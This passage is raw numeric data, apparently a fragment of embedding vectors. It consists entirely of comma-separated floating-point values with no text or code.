3,-0.0180027,0.01790302,-0.006368567,0.0020888576,0.017043334,0.014166833,0.0014433548,0.0055679786,0.011592984,0.008681762,0.018581646,0.037359465,0.025710193,0.012307407,0.00993328,-0.00029546954,0.0411288,0.0005472953,0.0049582794,-0.0056502577,-0.005787885,-0.0016690077,0.044848394,0.014711731,0.00713663,-0.009013324,-0.0124274725,0.00059933454,-0.021518057,-0.023438292,-0.00919811,0.013835799,0.013836021,0.0031273551,0.019516129,0.0051657516,-0.0015195502,-0.013121181,0.00085642235,-0.008936895,0.013222949,0.017674861,0.027218385,-0.013479862,-0.01346148,-0.016271515,0.0064904387,-0.0057608867,0.020870687,0.016954452,-0.002247011,-0.0060415757,-0.011622296,-0.0084102405,-0.012130418,0.011762863,-0.0037858873,0.023915289,-0.0065370067,-0.0120861055,0.00528056,-0.003819054,-0.0051020305,-0.008135233,0.01435472,-0.014617934,0.006010888,-0.016721832,0.02030531,0.0041959244,0.01676516,0.07397437,0.015149627,-0.001984746,-0.019989876,-0.01890487,0.010098751,0.025921445,-0.01738844,-0.0009546719,0.003746462,-0.030516567,-0.023141993,-0.014224227,0.013160672,-0.020994393],[-0.01732204,0.013327434,0.011774326,-0.008752376,-0.0071276496,-0.029230228,0.030749584,0.004915975,0.020073464,-0.02583362,0.0021701443,-0.0011683014,0.030898578,-0.005873006,0.015515722,-0.020852242,-0.008520074,0.007575507,0.011218368,-0.011006207,0.016725218,-0.011396423,-0.030691326,-0.014949543,-0.027599383,0.0372655,0.004233788,0.0021580956,0.005278379,0.0042951964,-0.004568878,0.024726206,0.01429324,0.025772946,-0.010200846,0.005218122,-0.038993508,-0.0096247895,0.030476417,0.025273072,0.014070852,0.023608254,0.014548917,0.027596626,0.0026417652,0.008201954,-0.015008631,0.002910195,-0.016649114,0.008992273,-0.023593029,0.023719678,-0.019111833,-0.0101027,-0.009863492,0.031705588,-0.0031292504,-0.028351026,-0.0015415575,0.019633967,-0.00060057966,0.043451067,0.010053302,-0.0012175571,0.016259804,0.0024353724,0.013826982,0.013057448,-0.026635474,0.004602029,0.003738959,-0.0076714493,-0.03065671,0.01166919,0.0001842821,-0.0004232315,0.01127546,0.010166806,-0.02245179,0.020144343,-0.030934397,-0.011660689,0.0046262997,-0.0032035788,-0.0039024788,0.0057212226,-0.0107229445,-0.011473532,-0.015603206,-0.0128658945,-0.009107806,-0.0058044656,-0.015720364,-0.0003096439,0.005440472,0.0031279298,0.012369297,-0.020933498,-0.01738613,0.021378186,-0.010353667,0.0068795267,-0.011778578,0.0021525945,0.012390135,-0.01425654,0.0108503625,-0.007468108,0.007927392,0.00744791,-0.00007849855,0.024763977,0.010682124,0.0010900307,-0.00037200417,-0.0005834365,-0.004618635,-0.015042026,-0.0035790268,0.007956554,-0.0057283416,0.03429607,0.011954768,0.0010052106,-0.00036721767,-0.025335528,0.009710539,0.025171198,0.004967427,-0.0055023865,0.0021206548,0.010957193,0.020969419,-0.0005806707,0.024987213,-0.014526264,-0.0024259281,-0.017277509,-0.016795363,-0.005546517,0.044916872,0.00011762589,0.009300902,0.0031527146,-0.016800411,-0.0057995613,-0.026234739,0.028495148,0.019978931,0.009661588,0.004989049,0.028148444,-0.01643304,-0.010071454,0.031356126,0.013035728,0.0070617343,-0.010911402,0.027267152,-0.030457443,-0.0051245904,-0.0032213936,0.011273954,0.01388958,0.001797985,0.017939499,0.0037366806,-0.025071565,0.003280568,-0.0077558653,0.011058535,0.010750889,-0.0042705014,0.016397182,-0.0104102325,-0.014967837,0.0034414206,-0.012560705,-0.00033596883,0.007079906,0.0045471676,0.015885517,-0.0057238257,-0.022541692,0.023954863,0.05097599,0.0051251296,-0.010501506,-0.003477509,-0.021921042,-0.013771107,-0.033279195,-0.02231227,-0.006979102,-0.01553237,-0.0036595478,-0.012119083,0.08373809,0.008329281,-0.017316842,-0.031625334,-0.0077808485,0.023725657,-0.025680441,-0.021831514,-0.006694661,-0.009419976,0.008712965,0.015238836,-0.009127508,-0.01435184,-0.010732031,0.0034526011,-0.021434609,0.0007146229,-0.019836329,-0.01964006,0.037117474,-0.005375125,0.013097389,-0.010177862,-0.01472446,-0.01958945,-0.013892218,-0.008736367,-0.024620976,0.015721671,0.019295793,0.0029829247,0.014523873,-0.015780723,-0.0022537003,-0.024606375,-0.023378013,0.0120587805,-0.015452393,0.010550232,-0.009784223,0.004379489,-0.0026685973,-0.0013016711,0.0067856247,0.018561777,0.0133926915,-0.035336815,-0.0031657692,0.006627884,-0.0042076246,0.014123536,0.0016791138,0.03349075,-0.022481274,-0.004664578,0.03220823,0.00021656066,-0.02488711,-0.0256884,-0.023092786,-0.010426179,0.012170913,0.011815078,-0.0046947785,-0.00304068,0.028927246,-0.002563173,0.00738352,0.01068109,-0.029666845,0.022803549,-0.0134726735,-0.010226067,0.009813938,-0.0035710388,-0.012035083,-0.018303009,0.0057640467,0.011047375,-0.033271145,0.016297733,0.014396848,0.010856427,0.01550258,-0.018079204,0.010444079,0.010824908,-0.01608093,0.0022518598,0.0010947854,0.016404586,-0.0050820555,-0.012162129,-0.0008757737,0.01423777,-0.008807187,-0.0112114325,-0.005735911,-0.042441178,-0.018060753,-0.0037389393,-0.028836017,0.013463389,-0.034744356,-0.005390559,0.0049990444,0.011512698,0.02148379,0.009865632,0.025765939,0.0006714135,-0.0010540874,0.0204274,-0.004876867,-0.0055663516,0.022524606,-0.015248232,0.0055611604,0.027369333,0.00912103,-0.0021725672,-0.010159457,0.010617584,-0.019937238,0.00687078,-0.0013664847,-0.011757068,-0.005350866,-0.00034301874,-0.0015254663,0.028248511,-0.016110843,-0.0025037793,0.004141148,-0.0007232128,0.016738912,0.00333324,0.03454812,-0.00047221084,0.016759522,-0.0007365617,0.025883943,0.012589269,0.005566782,-0.026938073,0.018990293,-0.0047030463,-0.02189206,-0.013622204,0.032163866,-0.011995867,-0.010859809,0.015877075,-0.029515624,0.015683148,-0.031087168,-0.041799847,0.0071153874,0.009167309,-0.02594622,0.008096453,-0.01456529,-0.0063784784,-0.02365919,-0.0065429285,0.03961617,0.04283554,0.012465922,-0.0023437922,0.01811845,0.019763341,-0.015895436,0.0012868166,-0.0057403906,-0.01045467,-0.0154629545,0.009849579,0.0015608852,0.0046466626,0.021667948,-0.013012859,0.011002769,-0.048382323,-0.025037233,-0.01390583,-0.03358697,0.005732869,0.01948069,0.023037424,0.01551349,0.020247603,-0.0057442556,-0.027621357,-0.020033173,0.020499587,-0.004725431,-0.014429953,0.019491691,-0.0138250915,0.00101014,-0.015103298,0.005161219,0.0346333,-0.01061691,-0.005307126,-0.0013293185,-0.016220015,0.011541929,-0.029543959,-0.0050390274,0.0030166009,0.012783367,-0.0039831577,-0.0021960202,0.022440685,-0.0006689956,0.015348173,0.00547363,-0.0060204025,0.012507422,0.00053224247,0.025044603,0.0022157498,0.0073834476,0.028723367,0.0018726474,0.005690757,-0.00545384,-0.019128127,-0.028438095,-0.014003162,0.026226183,0.01016962,0.007179253,0.018648004,0.001466875,0.03185003,-0.0033669835,-0.03651111,-0.011019195,-0.0066936812,-0.002942089,0.030252999,-0.03950997,-0.0070878705,-0.00024404416,-0.028465481,0.0072060777,0.0061706807,0.037730798,0.017061751,-0.0040587154,-0.0008417169,0.007248718,0.013043872,-0.01260075,-0.015639823,-0.0058837044,-0.0358213,-0.017742503,0.0067837886,-0.0076287757,0.031394243,0.000041596108,0.008601092,-0.006532981,0.007309574,-0.015668785,0.0012384118,0.028984746,-0.009764849,-0.0067753377,0.012061994,-0.013278762,0.007709481,0.016061176,0.015613574,0.008468183,0.008413924,-0.00021260265,0.0049297553,-0.01631713,0.007655401,0.0115449,0.015544649,0.011108704,0.0035880804,0.0120594,0.024670515,0.0054156003,-0.0081470795,0.01769041,-0.009146674,-0.000014386004,0.029920846,0.015349566,0.0077043655,0.023382757,0.022788342,-0.032129504,-0.00024772293,-0.014409656,-0.020719077,-0.0011197331,0.0070884046,-0.0068201707,0.02324065,-0.0012080214,0.007447614,0.02545122,0.0055632726,0.018832192,0.024601297,0.0036484185,0.006811376,-0.019856168,-0.031443432,0.0034770663,0.011471932,-0.0021687439,-0.037938613,-0.009750267,0.02375545,-0.016326047,-0.007822124,-0.025508096,0.038124613,0.0031493164,0.007158364,0.012182854,-0.041799255,0.025050864,-0.013698159,0.05360756,0.0125090135,-0.011142637,0.003251468,0.019742232,-0.0024989157,0.0019634217,-0.022571824,-0.0027140127,0.014932807,-0.015073856,-0.0045322417,0.00127964,0.017128792,-0.0033464257,0.0010254361,0.010440686,-0.0006775333,-0.004035614,-0.0100234505,-0.010473735,-0.013602383,0.019255722,0.0128412675,-0.02131013,0.012299217,-0.010101025,-0.0070849177,0.0048571927,-0.0035605356,0.006198688,-0.0044279727,-0.0060561914,-0.0051536416,0.027064638,0.016796505,-0.006658279,-0.021076433,-0.0016506879,-0.007725844,-0.021383185,0.006794699,-0.004454532,0.015888575,0.009755355,0.013621055,0.0144222425,-0.0005644962,0.015614827,0.0037801967,0.02384432,0.026986822,0.026628748,0.03979788,0.0009943885,-0.0026434509,0.0054902784,0.006070304,0.003256874,-0.014627043,0.005305059,0.0040769028,-0.041353952,0.005657581,-0.0052772313,0.036652807,-0.0030440555,-0.013504213,-0.0060719564,-0.029862499,0.014700412,0.006812256,-0.0076270592,0.0017531267,0.01103487,0.0027119017,0.0004054348,-0.007953579,0.0034587302,-0.010926637,0.029100886,0.010097085,0.010670276,0.017739482,0.008604388,-0.0027743932,-0.0046645636,0.027449176,0.009410864,0.026807183,-0.0036348912,0.022676844,0.016839761,-0.021313852,-0.008147319,0.008998638,0.01604031,0.00512871,0.0042310315,0.018281965,-0.036723465,-0.016480006,-0.0019197081,0.036932755,-0.007502163,-0.010745037,-0.016860645,-0.016540302,-0.010172497,-0.021001304,-0.008982895,-0.029527375,0.006119303,0.006242314,-0.007950788,-0.0014827072,0.0014298426,-0.03810504,-0.0178962,-0.000053133987,-0.021003636,0.0015520212,-0.008719466,-0.009111287,0.02350325,-0.022068502,0.020389883,-0.0374911,-0.021516884,-0.02132914,-0.022073414,0.004172627,0.008451429,0.021034792,-0.018524187,-0.00086327334,-0.015315666,0.014301057,0.003538187,-0.0047337874,-0.010597057,0.01056119,0.026399707,-0.0064329347,0.004947117,0.018445583,0.007854117,-0.005608318,-0.015771981,0.0066147316,-0.008544103,0.0030560333,-0.0066410727,0.020474546,0.005051099,-0.0035515223,0.00593705,-0.0028178887,0.0027143317,0.0069333836,0.034063302,-0.009638673,-0.022217063,0.033467386,0.010517056,-0.014987427,-0.007322069,0.04201534,0.022408225,-0.01100309,-0.0037240963,0.0015942007,0.0039252546,0.013155851,-0.0011832364,0.017875273,-0.01347169,0.025105648,0.041147202,-0.023990368,-0.026114853,0.027388427,0.0024774724,0.014490331,-0.012296246,0.004693586,0.0067687803,-0.027859509,0.019062975,0.02920142,0.015356962,-0.036519427,-0.030303644,-0.020533534,0.009756477,0.04972278,0.010853051,-0.0015556524,-0.008301607,0.012748083,-0.02027517,0.026038768,-0.020676445,-0.0060712844,0.016287597,0.017440572,-0.012247383,-0.0005056581,-0.017376045,-0.00042221273,0.018977633,0.009171914,-0.0015978261,-0.00065862783,-0.010258098,0.01776623,-0.043183155,-0.00918652,0.019311696,-0.0070439945,0.0070994534,-0.009120914,-0.0036148468,-0.015141034,0.03351579,-0.015589152,0.038811613,-0.00022942644,-0.03764746,0.017859943,-0.011732445,-0.014687425,-0.00023472552,-0.013149549,-0.036705557,-0.032155033,-0.0070201647,-0.01525243,-0.013611359,-0.006511858,-0.007005717,-0.019932333,-0.00031907382,-0.011080072,-0.029263372,0.02017557,-0.0066896463,-0.006321988,-0.039306175,-0.0063647446,0.006777915,0.021295652,-0.02097702,-0.0035296176,-0.016180478,0.009032633,0.0056593306,0.012627416,0.009703403,0.018756438,0.005498433,-0.002580319,-0.02059109,-0.0045568636,0.0011844594,-0.019959074,0.015181794,-0.016866382,-0.0027470267,0.004955177,-0.0008983127,-0.02239266,-0.0026688823,0.009969997,-0.002027689,-0.00486209,-0.0036626672,0.010726394,0.005576577,-0.004763151,-0.01549739,-0.0060213897,0.015412929,0.0071834093,-0.018928474,0.019256884,-0.022716023,-0.0006515646,0.013963782,-0.05246844,0.003612081,0.013839164,-0.044698127,-0.015261209,-0.024589133,0.005474701,0.045663744,0.026370343,0.017270422,0.015127681,0.004994387,0.009503548,0.019135434,0.015457184,-0.020974757,-0.011141113,-0.00049327593,0.0057457453,0.0145948455,-0.020413924,-0.04535819,0.011797402,-0.019928599,-0.003324956,0.014342186,0.019655485,-0.019128961,0.019951854,0.00029580505,0.029594107,-0.005610974,0.03364871,0.011198849,-0.009021265,0.00941205,0.011924033,-0.018568,-0.01594692,-0.01546728,0.009382113,0.00023092244,-0.012354321,-0.02930033,-0.022469696,-0.004318607,-0.014732175,0.0031019836,-0.013445965,0.018192347,0.0048316293,-0.038268175,0.03079247,-0.009753263,-0.018121533,0.010987364,0.011502973,-0.016111745,-0.0012481675,-0.0154980915,0.004912355,0.0074958364,0.037515096,0.012810672,-0.0074243066,-0.0027663037,-0.024121393,0.032567937,0.005839125,0.03051334,-0.02318387,-0.029323943,0.036920812,-0.02339916,0.0015634332,-0.019781731,0.023731962,0.0076937717,-0.020783773,-0.006948493,0.0124513395,0.022711396,-0.013360122,-0.0072460477,-0.0028398305,0.0024507223,-0.0092147915,-0.0045165215,0.021413626,0.0044959798,-0.01144364,-0.0047502504,0.0027417426,0.008611295,-0.0032167614,-0.014605044,-0.01949081,-0.04064909,-0.0011036905,-0.012873512,0.011182591,-0.031966608,0.011967716,0.026580043,0.015621381,-0.04606066,0.0022565385,0.004570167,-0.034917884,0.033832576,-0.012880062,0.001794085,0.012688929,-0.01133373,-0.013321005,-0.04146142,-0.001709699,-0.014129693,-0.084812395,0.007931395,-0.0019802293,-0.006722961,0.015570424,0.030913476,-0.008796401,0.013005491,0.017372156,-0.0072152507,-0.0047701453,0.0072524296,0.041178044,0.0052528195,-0.015332041,-0.01484697,0.004328493,0.0022525627,0.025395226,0.003191676,0.006898913,-0.004746446,-0.010400866,-0.0049908473,-0.005894581,0.0074425275,-0.017307153,-0.01720764,-0.01709943,0.013149401,-0.0064407294,0.011097916,0.0142879775,0.005696447,-0.029149164,-0.013314879,0.009115024,0.0034998572,0.0063834116,-0.0027492354,-0.029514555,-0.006664,-0.0056253043,-0.0025773628,-0.015984632,0.0059743924,-0.009179288,-0.0042168675,-0.0046328628,-0.033256754,-0.015622022,-0.008517868,0.012433374,0.015080055,0.019976638,0.0018707378,0.013693308,-0.014856544,-0.008122528,0.031530127,0.0064425343,-0.019587038,0.04001826,0.004468505,-0.05118966,-0.029643692,-0.015217008,0.01061311,-0.017794129,-0.022353034,0.020252336,-0.0018164807,0.03682063,-0.0026154537,0.003915207,0.020106006,0.032384213,-0.005762809,-0.0064746942,-0.0037945826,0.0049681566,0.019459808,-0.0005063459,-0.030361233,-0.00930601,-0.012753216,-0.0120895635,0.01439208,0.00782823,-0.01377448,-0.021491336,0.028365083,-0.023144335,0.018197082,-0.008149248,0.017583854,0.0049585234,-0.015622056,0.003796189,-0.022178082,0.013364258,0.009475442,-0.0017756874,0.027021673,-0.00070644764,0.000069185895,0.0029317369,0.0005633174,-0.009991389,-0.0042197723,-0.026044542,-0.0037859762,-0.031336438,-0.007806404,-0.009407643,0.015867488,-0.015128243,-0.015610108,-0.005928218,0.025996292,0.012135536,-0.0015132785,0.046033565,-0.00068857695,-0.022558542,-0.030608453,-0.0027908795,-0.016804848,0.0018598683,-0.009208063,-0.020658638,-0.008465438,-0.014308616,0.004970702,0.013166476,-0.002652683,0.029070081,-0.038867448,-0.024885228,0.010436977,0.0134281,-0.0023717156,0.0027766905,-0.001309247,-0.017306102,0.028267557,0.029033022,0.010213491,-0.017209888,0.002655195,0.013081851,-0.008525931,0.009905371,0.00693142,0.012079892,0.0036502115,0.0075254664,-0.021608371,-0.0009396926,0.0022711377,0.008268874,-0.03417607,0.011301981,-0.015812345,-0.023174081,-0.018240985,0.005901173,-0.019275116,0.0033614552,-0.0042035873,-0.01346664,-0.022986056,-0.0017861596,0.0244301,-0.0067953784,-0.041052032,0.010273483,0.020061916,0.0036511088,0.0021163,-0.018045347,0.027940542,0.024757784,0.0060700784,0.012524955,0.007869844,0.009343344,-0.008812616,-0.030977884,-0.011524721,0.0010486747,0.0026228006,0.010316569,0.017345533,0.0059826304,0.030566238,-0.02182912,0.008545749,-0.013769202,-0.003527812,-0.00504852,0.0007396837,0.0136441495,-0.02607636,-0.0014875556,-0.016410796,0.0070916587,-0.007439146,-0.028876932,0.015868064,-0.016531935,0.017982064,0.0013133466,-0.013070532,0.014762631,-0.018272204,-0.026503263,-0.009800551,-0.015879456,-0.009547219,0.0032830574,0.014980601,-0.03405319,-0.0017387636,0.0145682,0.009201847,0.0008326882,0.010499957,-0.0046346984,0.021104725,0.020591654,-0.029943774,-0.004418289,0.015359726,-0.024209015,0.013657858,0.009524453,-0.021708062,-0.012669794,0.013039984,0.0036757695,0.011919993,-0.009571129,-0.00012401282,0.0039437963,0.009344122,0.0014293845,0.00787916,-0.012670277,-0.009234906,-0.025453035,-0.033230532,0.024134398,-0.008807538,-0.026714802,-0.026455823,-0.040724404,-0.0019823413,0.019685786,-0.03445354,-0.015945174,-0.0020684178,-0.0065833987,-0.024186978,0.016424574,-0.0038313454,0.0021589452,0.03094899,0.0017037664,-0.024556682,-0.030373719,-0.02057868,0.0029290754,0.011306783,-0.0046745315,0.024466824,0.010192819,-0.014388011,0.007227632,-0.020794906,0.02456167,0.009057055,0.011341752,-0.024434624,-0.012762612,-0.007563396,-0.0013782049,-0.012243126,0.021517243,0.0013146562,0.020522796,0.034876622,0.0092907045,0.007842787,-0.0009792305,-0.034721762,0.008687299,0.0061193127,0.009628648,-0.00079311506,0.0662195,-0.011186928,0.010371021,0.001716048,-0.0035411154,-0.018145762,0.020261087,-0.008093646,-0.00954028,-0.009637704,-0.012483551,-0.021214478,-0.01774567,0.0066887555,0.01700529,0.003938862,0.006981042,0.0038941836,-0.0008544925,0.009215316,0.014157226,-0.019542137,-0.0100282235,-0.01783525,-0.014662047,0.029779024,0.029441671,-0.014156265,-0.015748471,-0.045707855,0.006527078,-0.0013418797,-0.008253181,0.024965944,-0.047193382,0.0012028606,0.013449168,-0.004978645,-0.014209319,0.028791744,0.0037270233,-0.010255266,-0.00450432,-0.017695311,-0.008552422,0.0026870011,-0.008163322,-0.009333037,0.025683062,-0.017103128,0.03972231,0.0009272876,0.013967205,0.029244553,0.013053355,0.0059311655,0.016443357,0.0047401246,0.016098298,0.0014908453,0.0048119584,0.025465565,-0.006888358,-0.0027541611,-0.015592971,-0.04516809,-0.008463282,-0.009568386,0.017556185,-0.019777462,0.031944748,-0.0011916327,0.016576136,-0.002598524,-0.009561071,-0.029503485,0.007835567,-0.02954657,0.014262672,-0.023955138,0.021030871,-0.030644525,0.011325702,0.010633234,0.017127112,-0.011695113,0.0012795175,-0.017052153,0.018339857,0.022935212,-0.005883872,0.00939435,0.0014500639,0.015561516,0.0015817203,0.0004083713,-0.0058839475,0.007538982,-0.014069384,0.030724546,-0.004298399,0.002188231,-0.0014449934,-0.008050808,-0.014296277,-0.009474828,-0.0026825122,-0.0038612145,0.001164092,-0.0034023765,0.011825737,-0.0065130405,0.008377994,0.0011507564,0.010720493,-0.018476438,0.017707126,-0.0241665,-0.011210333,0.02770687,0.009913236,-0.010092795,0.030239778,-0.005992456,0.022444164,0.060061146,0.020877486,0.0049082055,0.013178874,-0.0047680973,0.0076714633,-0.07851676,0.014917455,-0.000002110778,-0.0033630442,0.004586853,0.0045641707,-0.012257438,0.011266033,0.015743965,0.026407564,-0.017288698,0.021043131,0.019424085,0.0064369673,-0.00472321,0.013283797,-0.00016256816,-0.009200598,-0.025370752,0.0028286367,0.015458416,-0.0055607534,0.0124791525,-0.0042940173,-0.00018522749,0.014318964,-0.0044137025,0.027306467,-0.01820251,0.013276269,-0.001325797,-0.0055332915,-0.0025263373,-0.010243774,-0.014160808,0.0097411545,-0.00062334014,-0.027457451,-0.04631027,-0.0041135508,-0.055035714,-0.028449874,-0.015308162,0.0030040396,-0.01940437,-0.011086842,0.0022339697,0.0023089412,0.012456762,0.0259009,-0.011856346,0.0218047,-0.0023120593,-0.0010748381,-0.002747843,-0.028452272,-0.0096272025,-0.009423075,0.011309594,-0.019962443,-0.024388203,0.00433367,-0.010008996,-0.0066063204,0.006027046,0.0010394073,-0.019288361,0.014137245,0.028563922,-0.009016817,0.006226136,-0.0040330333,0.025717098,-0.0010281192,-0.012057992,0.006273172,-0.007966902,-0.00006757206,0.0031631826,-0.026724555,0.010681349,0.004888537,0.0005526329,0.025513582,-0.008995372,-0.03439275,0.011557239,0.005805203,0.032841034,-0.010225867,-0.015974106,0.021912875,-0.019870406,-0.0031117974,-0.0023087652,-0.009615024,-0.006801881,-0.008399371,-0.038819805,-0.036828678,-0.01127494,-0.037554033,-0.002324023,-0.006297082,0.0030371684,-0.034332655,-0.0105996905,0.012537985,0.010748828,0.007758467,0.021157416,-0.012719488,-0.002958855,0.002352547,-0.00914386,-0.02957187,0.0022454618,0.020595485,-0.022073751,0.0019417981,0.0008611576,-0.001676602,0.015214675,0.0006599691,-0.006687007,-0.0009593797,0.014269164,0.0249904,-0.0050158086,-0.040510163,0.010416541,0.007449578,0.012113507,-0.0010906591,0.019222122,-0.0046968125,-0.009331645,-0.0117887035,-0.015109605,-0.028654255,-0.012004544,0.026761167,-0.002279638,0.02629948,0.013306176,-0.0032042956,-0.017888553,-0.03919737,-0.055165112,-0.020656968,0.0036461002,-0.027865564,-0.006531895,-0.011430708,-0.014895105,0.0069127,0.010208906,0.00911742,-0.005898172,0.002907748,-0.030703267,-0.007727525,0.022457909,0.011880476,-0.018992975,-0.012259787,0.0100033125,0.030957201,-0.040045448,-0.003030306,-0.009913834,0.018195396,0.024745146,-0.015682628,0.014107569,0.049026664,-0.029678795,-0.050963428,-0.0031394062,-0.0000020533585,-0.015379693,0.0012210822,-0.0014822619,0.011477307,0.012501209,-0.03472699,0.025748247,-0.02003483,0.019033676,0.0040656826,-0.013485629,-0.00030422534,-0.007592832,0.054727707,0.019201806,0.0031337233,0.00795166,-0.0054101385,-0.0051447926,-0.010201425,-0.005532378,0.007676702,-0.0063240994,-0.0026391307,-0.014001022,0.004239046,-0.027794465,-0.013030935,-0.023791375,0.018156335,0.017083578,0.0057800165,-0.003536346,0.0034412171,-0.022136938,0.0015600102,0.02401048,-0.022197355,0.004456484,0.028328992,-0.005157526,-0.0014057474,-0.0112182405,-0.0379556,-0.0058041103,0.023589134,-0.013414489,0.029328572,-0.0005579085,-0.0036485193,0.014574088,0.011740843,-0.033020698,-0.0031635384,0.008017999,0.011238779,0.020656157,-0.008934599,0.0025904248,-0.023490964,-0.0006360971,-0.024062943,-0.023712775,0.020085445,0.008258257,-0.011528399,-0.021906529,-0.011675809,0.013630683,-0.007590865,-0.038013812,-0.02535317,0.0043064435,-0.0023168037,-0.007693413,-0.000935312,0.0041818125,-0.00712378,-0.013253577,0.017734297,-0.016215837,0.009894566,0.015570866,-0.009787004,0.028970148,0.0037441668,-0.008425563,-0.017834578,-0.016878454,-0.0019552892,-0.0191721,-0.022119116,0.0011344689,0.028064586,0.04378933,0.01135456,0.0022453873,0.012764635,-0.0042297184,-0.012658652,-0.007885694,0.0031839234,0.037839137,0.015566483,0.018747965,-0.007079829,-0.004984096,-0.01876735,0.0037054245,0.051213846,0.004203664,0.009558637,-0.00076395686,-0.0051292973,0.013887642,0.008601379,0.014766129,0.02075701,-0.012478735,-0.011455043,0.0052602524,-0.012092937,0.013828049,-0.009482445,-0.027921043,-0.0077491645,0.005219189,0.0037250614,0.007301245,0.025652185,0.0055938554,0.00780937,0.001070447,-0.0031671685,0.013269035,0.016791312,0.00820972,0.029424222,-0.007955419,-0.0283618,0.013227142,-0.027961692,0.025812067,0.007989607,0.012092985,-0.031120488,0.023577988,-0.0127676055,-0.016578356,0.0012851437,0.00039194935,0.002720721,0.0016403361,-0.022975828,0.02642568,0.01592295,0.0006919467,-0.009187888,-0.009473812,-0.044724032,-0.0006866741,-0.013489511,0.00721637,-0.015199241,-0.0064348946,-0.010184926,0.014388959,0.0081893755,0.0012989083,-0.039045643,0.009400396,0.011388999,-0.012152309,0.010486559,0.008624241,0.0026101826,0.01618594,-0.008412848,0.012408503,0.03019609,0.0008911172,0.013328721,-0.000211531,-0.017075842,-0.019591013,0.017875243,0.028852684,0.0039659226,0.009454784,-0.016868131,0.0029972168,0.007786394,-0.020679038,0.007979286,-0.005943216,0.00980495,0.025521541,-0.012422734,0.011063747,0.0014924719,0.01728482,-0.0037972564,0.0006249918,0.011811968,0.009508776,0.006248276,0.013044908,-0.024332853,0.010757783,0.00326936,-0.014021095,0.00068866013,0.013623974,-0.011898214,0.023687566,-0.043087307,-0.015570312,-0.015652446,-0.018080035,0.01963604,0.002009066,0.011120308,-0.0148586035,0.015220145,0.006138709,-0.023129724,0.0014403965,-0.018527577,-0.00018241847,-0.015460778,0.015850723,-0.026256308,-0.015147939,-0.007827174,0.011167318,-0.025344174,-0.03057017,0.009870527,-0.021264177,0.005471028,0.05062315,-0.016155887,-0.008165127,-0.001710305,0.021290217,0.027661664,0.012172784,0.00093697116,0.0059460653,-0.009185583,-0.000830807,-0.019302769,0.050548375,-0.024611998,-0.01680611,-0.0226215,0.024819491,0.022343414,-0.002415093,-0.015963135,-0.028561302,-0.008475759,0.015494832,-0.0030428332,0.008230011,-0.05133875,-0.002804471,0.02834698,0.0041022724,-0.0020927964,-0.023085007,-0.0017333899,0.0057458375,0.0150143355,-0.015117069,-0.009196574,0.00040738212,0.040154614,0.007029914,-0.018530667,0.0153766405,-0.018971602,-0.006678484,-0.016210955,-0.0003610848,0.032253757,-0.003719622,0.003935554,-0.0013166916,0.03767564,0.023651155,0.027046027,-0.02117324,0.004830257,-0.017256143,0.009877707,-0.004988282,-0.02432441,-0.019883266,-0.0057331137,0.008777721,0.0028084388,-0.02054482,-0.014675483,-0.008684413,-0.005427688,0.013685414,-0.010730995,-0.013117322,0.000064711785,-0.02170948,0.016086949,0.011830844,0.005422323,0.01418093,-0.01412964,0.006674136,-0.0010382016,0.00077937305,-0.00025549275,-0.042713657,-0.020250997,-0.00019631503,-0.00024008294,0.0036186422,0.025322346,0.0064820033,0.013131424,-0.004168741,0.044009622,0.0453992,-0.0033454376,0.007926295,-0.013990876,-0.0034307055,0.010297827,0.016128827,0.01618478,-0.0111202765,-0.022292303,-0.005144286,-0.014546511,0.008497781,-0.00008750974,-0.01251513,0.022319468,0.024020014,0.026287043,0.0073666167,-0.023224674,0.006220055,-0.005169782,0.020056423,0.05785793,0.004511472,-0.053934075,-0.013571098,0.024995066,-0.0014770384,-0.043955036,0.025105122,0.007832407,-0.03365308,0.006572312,-0.008115521,-0.009754884,0.012326411,0.004586578,-0.021596843,-0.029245393,0.012551485,-0.0022745654,-0.0050554266,0.01813809,-0.0038729908,0.016992604,-0.0031806333,-0.02140432,-0.015025325,0.025797013,-0.009288075,-0.0038467445,-0.018543588,-0.014101073,-0.010783287,-0.020500915,0.006306573,0.0034245376,-0.033380754,0.0059970734,0.0067382636,0.005231614,-0.0071792584,0.02223393,-0.015458459,0.016078684,-0.0060785194,-0.020604702,0.0011168201,-0.019944528,-0.002383987,-0.02151753,-0.010474711,0.0061575864,0.022324238,0.017663924,0.0118382815,-0.006747543,-0.024409262,0.0073666354,-0.017424652,-0.022346228,-0.015718473,0.014401707,-0.0010092411,-0.029183945,-0.02475637,-0.011355653,-0.009671289,0.009879364,-0.00629082,-0.01986459,0.007908105,-0.014129581,0.008606988,0.026541136,-0.0071807858,-0.019073114,0.0017542453,-0.023161924,0.0017927239,0.0093883,0.0056648306,0.020606415,-0.0044082454,0.009412822,0.013288217,0.030333634,0.013076937,-0.010034159,-0.02857543,0.029318484,0.010696096,0.033941384,0.035555955,0.014548292,-0.017147869,0.0031441269,0.017395832,0.0017949742,-0.09721168,-0.013196698,-0.0007184765,-0.0048187375,0.00040208042,-0.0004205277,0.00013499762,-0.0021054342,0.007729704,0.04526466,-0.003961608,0.023635432,-0.006190091,-0.01075781,0.010992461,-0.0071567805,-0.0066340957,0.010715998,0.011216084,0.0038288508,0.004368806,0.016322752,0.0042878482,-0.0035637433,-0.011636215,-0.0037787508,-0.0113176545,0.0057976837,0.008604778,-0.008022242,0.010733833,-0.014707139,-0.02103983,-0.0037758728,-0.006598673,0.014969689,-0.00060789956,-0.0055767843,-0.016588923,-0.0026179338,-0.00021252148,0.004754548,0.006784187,0.0010941922,-0.008770964,-0.0012592733,0.0066084294,0.017750472,0.003783992,0.0018454845,0.009980903,-0.02343336,0.0068281568,-0.017180448,-0.032027125,0.010874671,-0.012158369,0.025896305,0.009231087,-0.010700307,0.006980398,0.035622496,-0.0101505425,0.0123372795,-0.0024706558,0.0062849526,-0.0003592839,0.040421985,-0.01022861,0.010093999,-0.000924393,0.029409084,-0.0017967941,0.0035380314,0.004965976,0.032788936,0.02988007,0.020453451,-0.008138435,-0.011207176,0.005453489,-0.021152588,0.021937622,0.013269553,-0.012826232,0.050346296,-0.0134453755,0.0042952136,0.006863112,0.01923397,-0.0010163023,-0.028749837,0.0012996265,0.010973326,0.03146522,0.019614672,0.031071179,0.011084177,-0.008210019,0.008477734,0.0059118764,0.007454272,-0.0029431756,-0.010297811,-0.0055240532,0.012231062,0.0029073795,-0.01650642,0.0033682548,0.0011723283,-0.004063098,-0.003202042,-0.01766255,-0.0036927955,-0.00012428299,-0.0014875015,-0.011512481,0.0051233573,-0.021790812,-0.009650586,0.04215955,0.0019069692,-0.0005804461,0.015760647,-0.008697316,-0.0161087,-0.012953938,-0.0037933995,